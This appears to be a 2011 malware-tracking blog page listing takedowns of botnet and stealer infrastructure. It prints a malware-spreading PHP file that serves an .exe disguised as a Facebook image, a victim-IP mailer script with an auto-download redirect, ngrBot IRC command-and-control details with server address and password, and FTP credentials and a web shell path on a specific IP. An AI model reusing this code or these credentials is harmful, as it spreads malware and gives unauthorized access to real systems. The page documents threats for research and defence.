// malware info hxxp://vxvault.siri-urz.net/ViriFiche.php?ID=10462 hxxp://www.threatexpert.com/report.aspx?md5=9EB8326C223D9330BD8B3924F4D71476
Friday, December 2, 2011
Owned - Maware - newcarsnc.it
Thursday, December 1, 2011
Owned - Botnet - concertnomade.com
Session Ident: #!loco! [14:03] * Now talking in #!loco! [14:03] * Topic is '.m.s|.m.e fotoo :D http://www.concertnomade.com/templates/profiles.php?= ' [14:03] * Set by wd91 on Thu Dec 01 13:55:46 [14:07] * Disconnected
OWNED - Botnet - 208.67.252.82
Owned :P
// sample found here :
hzzp://vxvault.siri-urz.net/ViriFiche.php?ID=10452
// spreading file profile.php?=
header('Content-disposition: attachment; filename=IMG886384737664934-JPG-www.facebook.com.exe');
header('Content-type: application/octet-stream');
readfile('qwe2');
Wednesday, November 30, 2011
Stealer - FTP - 199.238.129.124
IP : 199.238.129.124:21 USER : volun7 pass : amigo+10 // Shell hxxp://199.238.129.124/xxx.php
Monday, November 28, 2011
Owned - ngrBot - idhrix30 (HF)
63.223.79.122:5794 PASS ngrBot
NICK n{US|XPa}owsekei
USER owsekei 0 0 :owsekei
JOIN #chan ngrBot
JOIN #chanspread
PRIVMSG #chan :[DNS]: Blocked 0 domain(s) - Redirected 13 domain(s)
$ip = getenv("REMOTE_ADDR");
$content = "
-----------------------------------------------------
INFECTADO SPREAD rlzz ng . =)
Fecha: $Fecha / Hora: $Hora
Ip Host Victima: $ip
----------
xD
----------------------------------------------------- \n";
$correo1 = "idhrix30@gmail.com";
$subject = "INFECTADO SPREAD rlzz ng - $ip";
$from = "From:INFETADO SPREAD rlzz ng ";
mail($correo1,$subject,$content,$from);
?>
html>head>
meta http-equiv="refresh" content="0; URL=IMG80593858.exe">
/head>
Subscribe to:
Posts (Atom)